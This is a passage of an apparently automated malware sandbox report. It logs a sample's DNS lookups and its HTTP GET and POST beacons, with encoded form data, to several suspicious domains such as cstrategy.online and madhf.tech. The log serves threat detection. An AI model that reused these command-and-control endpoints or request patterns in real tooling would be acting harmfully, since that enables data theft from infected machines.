                                                        Dec 3, 2024 14:42:58.557343960 CET8049944104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:42:59.650861025 CET8049944104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:42:59.651680946 CET8049944104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:42:59.651751995 CET4994480192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:42:59.952943087 CET4994480192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:00.976016998 CET4995080192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:01.096039057 CET8049950104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:01.096129894 CET4995080192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:01.111830950 CET4995080192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:01.231848955 CET8049950104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:01.231929064 CET8049950104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:02.373033047 CET8049950104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:02.374073982 CET8049950104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:02.374119997 CET4995080192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:02.374162912 CET8049950104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:02.374211073 CET4995080192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:03.389878035 CET4995080192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:04.410717010 CET4996080192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:04.530888081 CET8049960104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:04.531033039 CET4996080192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:04.540548086 CET4996080192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:04.660990953 CET8049960104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:05.726226091 CET8049960104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:05.726242065 CET8049960104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:05.726373911 CET8049960104.21.58.90192.168.2.7
                                                        Dec 3, 2024 14:43:05.726376057 CET4996080192.168.2.7104.21.58.90
                                                        Dec 3, 2024 14:43:05.726423025 CET4996080192.168.2.7104.21.58.90

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 3, 2024 14:42:06.926243067 CET6369853192.168.2.71.1.1.1
                                                        Dec 3, 2024 14:42:07.589802027 CET53636981.1.1.1192.168.2.7
                                                        Dec 3, 2024 14:42:24.238840103 CET5344853192.168.2.71.1.1.1
                                                        Dec 3, 2024 14:42:25.274430990 CET53534481.1.1.1192.168.2.7
                                                        Dec 3, 2024 14:42:25.606462955 CET5344853192.168.2.71.1.1.1
                                                        Dec 3, 2024 14:42:25.743674040 CET53534481.1.1.1192.168.2.7
                                                        Dec 3, 2024 14:42:40.144525051 CET5500953192.168.2.71.1.1.1
                                                        Dec 3, 2024 14:42:40.739541054 CET53550091.1.1.1192.168.2.7
                                                        Dec 3, 2024 14:42:55.254833937 CET5539553192.168.2.71.1.1.1
                                                        Dec 3, 2024 14:42:55.629924059 CET53553951.1.1.1192.168.2.7

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 3, 2024 14:42:06.926243067 CET192.168.2.71.1.1.10xb022Standard query (0)www.cyperla.xyzA (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:42:24.238840103 CET192.168.2.71.1.1.10x7fc5Standard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:42:25.606462955 CET192.168.2.71.1.1.10x7fc5Standard query (0)www.cstrategy.onlineA (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:42:40.144525051 CET192.168.2.71.1.1.10x2478Standard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:42:55.254833937 CET192.168.2.71.1.1.10xc6e8Standard query (0)www.bser101pp.buzzA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 3, 2024 14:42:07.589802027 CET1.1.1.1192.168.2.70xb022No error (0)www.cyperla.xyzcyperla.xyzCNAME (Canonical name)IN (0x0001)false
                                                        Dec 3, 2024 14:42:07.589802027 CET1.1.1.1192.168.2.70xb022No error (0)cyperla.xyz31.186.11.114A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:42:25.274430990 CET1.1.1.1192.168.2.70x7fc5No error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                        Dec 3, 2024 14:42:25.274430990 CET1.1.1.1192.168.2.70x7fc5No error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:42:25.743674040 CET1.1.1.1192.168.2.70x7fc5No error (0)www.cstrategy.onlinecstrategy.onlineCNAME (Canonical name)IN (0x0001)false
                                                        Dec 3, 2024 14:42:25.743674040 CET1.1.1.1192.168.2.70x7fc5No error (0)cstrategy.online194.76.119.60A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:42:40.739541054 CET1.1.1.1192.168.2.70x2478No error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:42:55.629924059 CET1.1.1.1192.168.2.70xc6e8No error (0)www.bser101pp.buzz104.21.58.90A (IP address)IN (0x0001)false
                                                        Dec 3, 2024 14:42:55.629924059 CET1.1.1.1192.168.2.70xc6e8No error (0)www.bser101pp.buzz172.67.158.106A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.cyperla.xyz
                                                        • www.cstrategy.online
                                                        • www.madhf.tech
                                                        • www.bser101pp.buzz

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.74983031.186.11.114803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:07.730643988 CET368OUTGET /qygv/?Z4=CrodyR&HZ=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WnueYbl0MlUQedog3ODQ7MufRvJpC6GuxIcFfxXtcYIG+pMPKAdgLM64C HTTP/1.1
                                                        Host: www.cyperla.xyz
                                                        Accept: */*
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Dec 3, 2024 14:42:09.146034956 CET1236INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                        pragma: no-cache
                                                        content-type: text/html
                                                        content-length: 1251
                                                        date: Tue, 03 Dec 2024 13:42:08 GMT
                                                        server: LiteSpeed
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                        Dec 3, 2024 14:42:09.146066904 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                        Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.749866194.76.119.60803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:25.793107033 CET647OUTPOST /qx5d/ HTTP/1.1
                                                        Host: www.cstrategy.online
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.cstrategy.online
                                                        Content-Length: 215
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.cstrategy.online/qx5d/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Raw: 48 5a 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 59 6a 30 70 54 43 6f 42 30 56 47 58 4f 52 48 65 79 65 62 4f 47 79 75 77 63 77 73 75 78 4a 35 46 42 73 31 4e 75 4a 71 4d 2b 6b 65 44 49 6d 78 2b 72 67 3d 3d
                                                        Data Ascii: HZ=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYj0pTCoB0VGXORHeyebOGyuwcwsuxJ5FBs1NuJqM+keDImx+rg==
                                                        Dec 3, 2024 14:42:27.105839014 CET391INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Tue, 03 Dec 2024 13:42:26 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 178
                                                        Connection: close
                                                        Location: https://www.cstrategy.online/qx5d/
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.749873194.76.119.60803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:28.466450930 CET667OUTPOST /qx5d/ HTTP/1.1
                                                        Host: www.cstrategy.online
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.cstrategy.online
                                                        Content-Length: 235
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.cstrategy.online/qx5d/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Raw: 48 5a 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 32 32 43 51 51 65 2b 45 34 62 70 49 42 73 74 66 4b 57 6b 63 48 7a 49 68 46 52 35 2f 4a 33 6b 2f 55 58 39 38 44 49 64 52 52 79 73 6f 5a 50 56 61 65 46 54 6e 5a 69 74 6d 37 77 76 4f 42 61 76 2b 4f 53 33 46 54 70 32 30 71 6e 64 6f 50 4d 67 64 58 2f 78 4a 45 50 34 58 70 57 79 4f 6b 70 64 75 2f 41 51 45 77 71 74 64 68 79 48 56 74 52 79 48 61 6e 49 54 6b 34 41 43 53 51 31 62 44 59 35 74 57 57 55 4c 6e 47 38 6f 38 58 69 59 6a 57 4c 59 79 49 59 6d 76 6b 77 44 74 78 56 6a 72 65 74 68 54 37 70 46 30 51 36 39 54 6e 6a 63 74 70 79 72 55 79 62 67 66 62 53 44 58 33 61 7a 45 45 3d
                                                        Data Ascii: HZ=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjWLYyIYmvkwDtxVjrethT7pF0Q69TnjctpyrUybgfbSDX3azEE=
                                                        Dec 3, 2024 14:42:29.842113018 CET391INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Tue, 03 Dec 2024 13:42:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 178
                                                        Connection: close
                                                        Location: https://www.cstrategy.online/qx5d/
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.749879194.76.119.60803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:31.122350931 CET1680OUTPOST /qx5d/ HTTP/1.1
                                                        Host: www.cstrategy.online
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.cstrategy.online
                                                        Content-Length: 1247
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.cstrategy.online/qx5d/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Raw: 48 5a 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 33 69 43 4d 79 47 2b 43 62 6a 70 4a 42 73 74 57 71 57 6c 63 48 79 4b 68 46 4a 39 2f 4a 72 30 2f 57 76 39 75 56 55 64 58 6c 6d 73 69 5a 50 56 58 2b 46 53 70 35 6a 6c 6d 37 67 72 4f 46 2b 76 2b 4f 53 33 46 51 78 32 39 62 6e 64 6b 76 4d 6a 55 33 2f 44 44 6b 4f 32 58 76 2b 45 4f 6b 63 71 75 75 67 51 46 51 36 74 61 43 61 48 59 74 52 77 41 61 6d 50 54 6b 30 68 43 53 4d 54 62 44 63 58 74 55 47 55 4c 51 7a 77 77 4e 48 49 4c 7a 43 32 54 52 6b 35 76 65 6b 7a 44 64 38 70 6c 35 32 39 70 6a 33 70 4d 6c 4d 69 77 47 37 6c 41 63 46 6b 72 56 79 31 6f 49 32 38 59 31 79 64 68 55 73 39 5a 67 46 5a 35 72 38 61 30 32 6a 71 71 36 37 33 50 6a 67 79 57 4f 61 76 61 45 72 77 33 6d 61 4d 35 44 46 4a 45 64 74 33 6c 62 6d 76 77 71 4b 2b 34 48 4f 54 53 6c 4a 2b 4b 48 2f 64 49 35 39 62 75 56 79 54 6b 64 78 62 68 63 50 48 62 2b 66 34 2b 45 57 54 2b 4a 31 5a 4d 6c 78 55 6a 54 4e 5a 76 52 6e 76 56 2f 6e [TRUNCATED]
                                                        Data Ascii: HZ=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH3iCMyG+CbjpJBstWqWlcHyKhFJ9/Jr0/Wv9uVUdXlmsiZPVX+FSp5jlm7grOF+v+OS3FQx29bndkvMjU3/DDkO2Xv+EOkcquugQFQ6taCaHYtRwAamPTk0hCSMTbDcXtUGULQzwwNHILzC2TRk5vekzDd8pl529pj3pMlMiwG7lAcFkrVy1oI28Y1ydhUs9ZgFZ5r8a02jqq673PjgyWOavaErw3maM5DFJEdt3lbmvwqK+4HOTSlJ+KH/dI59buVyTkdxbhcPHb+f4+EWT+J1ZMlxUjTNZvRnvV/nuvdH5iGgtTelP0OAq8muiqft5naxElSRZGlV681jST4M4XyUSJF+iVYRWH8vNilOpB5EUB66BvJpXiRX97hfGtteNQdw9hj9b5GnbL5LG5FjpTua2O6M/I5Ym/VEbO4uR4mSFwy6pFG/5XbRxxe/2R3kbS8Q6tUZH1PJMPi4Y7S1gpLaVqWfSgSL62DG0mbjPNIofhvknQixPX/oKOReM6OJMopO2bxl2TQlDQaKdps4WXRA+e0B+bjMAE8yO7sgfgiVjWcRWgm2U15X3XIDQwb9/QHBudHSskPWCcKXT5kepOU/cADgGx82tzd0tpOG7zCzRret+dLFjDu36aLBzXauIy4SdIHdVMZ12m490T7F/JaApCZVKBlX8v//211rY43/i6NISUJEN9kE3vH4H8649X/0Ob7CNoqTFdIRkiaomb+wKLA3Je/PvCR6B/4J546boqtRcnA7u5kuRgzyODTab1Z4lqrAJrCam1WeyMKxiqniBTldMQgYvPLzohpN/gey3Wwji0pRwmUwS6DOmj9ATt9+vaDT/7b38+mteBicl1VkRSP5Yy4kvNwlKA/wpho8RmEAPgCtks5tlSc1jNn/UtQr5XbwarpqjsnQ7xSsA0CkbYYeTLg2Tx4+w9MLgNF4/iRfmPL/7Ty0LELbvBKYzvuKUpuwC/ [TRUNCATED]
                                                        Dec 3, 2024 14:42:32.545078993 CET391INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Tue, 03 Dec 2024 13:42:32 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 178
                                                        Connection: close
                                                        Location: https://www.cstrategy.online/qx5d/
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.749885194.76.119.60803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:33.772001982 CET373OUTGET /qx5d/?HZ=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPupPRQa5YnsqE2u4tLTeO6fSmNSULxsWJgPs8P1zGJQzra9DrAEYIvPdA&Z4=CrodyR HTTP/1.1
                                                        Host: www.cstrategy.online
                                                        Accept: */*
                                                        Accept-Language: en-us
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Dec 3, 2024 14:42:35.135171890 CET545INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Tue, 03 Dec 2024 13:42:34 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 178
                                                        Connection: close
                                                        Location: https://www.cstrategy.online/qx5d/?HZ=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPupPRQa5YnsqE2u4tLTeO6fSmNSULxsWJgPs8P1zGJQzra9DrAEYIvPdA&Z4=CrodyR
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.749901103.224.182.242803644C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 3, 2024 14:42:40.879669905 CET629OUTPOST /6ou6/ HTTP/1.1
                                                        Host: www.madhf.tech
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-us
                                                        Origin: http://www.madhf.tech
                                                        Content-Length: 215
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.madhf.tech/6ou6/
                                                        User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                        Data Raw: 48 5a 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4d 79 41 43 68 48 6f 43 65 74 65 32 61 66 4b 56 76 2f 48 4a 42 49 4b 31 37 34 31 67 65 67 4c 48 2f 6f 76 38 79 71 39 2f 49 67 50 45 58 32 32 33 4e 53 30 34 50 58 50 54 4b 36 34 65 30 46 71 2f 36 78 55 78 57 64 54 42 39 57 37 6a 2f 4e 46 6c 32 4d 68 64 35 49 70 68 50 45 62 37 51 37 36 2f 4b 73 73 6b 45 57 41 4b 55 4f 78 4a 4c 50 64 67 75 67 44 77 74 44 4e 62 53 6e 71 43 6d 31 65 36 43 39 39 4a 66 78 6d 75 45 4c 4c 6d 5a 6f 79 4e 6e 64 67 46 53 51 73 4e 37 68 47 57 62 33 4a 76 74 46 39 74 45 57 72 7a 49 51 42 50 4f 38 4d 6a 6f 72 4d 61 6d 32 54 64 57 73 71 65 4f 61 42 2f 4f 36 6b 69 36 67 3d 3d
                                                        Data Ascii: HZ=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFSQsN7hGWb3JvtF9tEWrzIQBPO8MjorMam2TdWsqeOaB/O6ki6g==
                                                        Dec 3, 2024 14:42:42.138322115 CET871INHTTP/1.1 200 OK
                                                        date: Tue, 03 Dec 2024 13:42:41 GMT
                                                        server: Apache
                                                        set-cookie: __tad=1733233361.3016953; expires=Fri, 01-Dec-2034 13:42:41 GMT; Max-Age=315360000
                                                        vary: Accept-Encoding
                                                        content-encoding: gzip
                                                        content-length: 576
                                                        content-type: text/html; charset=UTF-8
                                                        connection: close
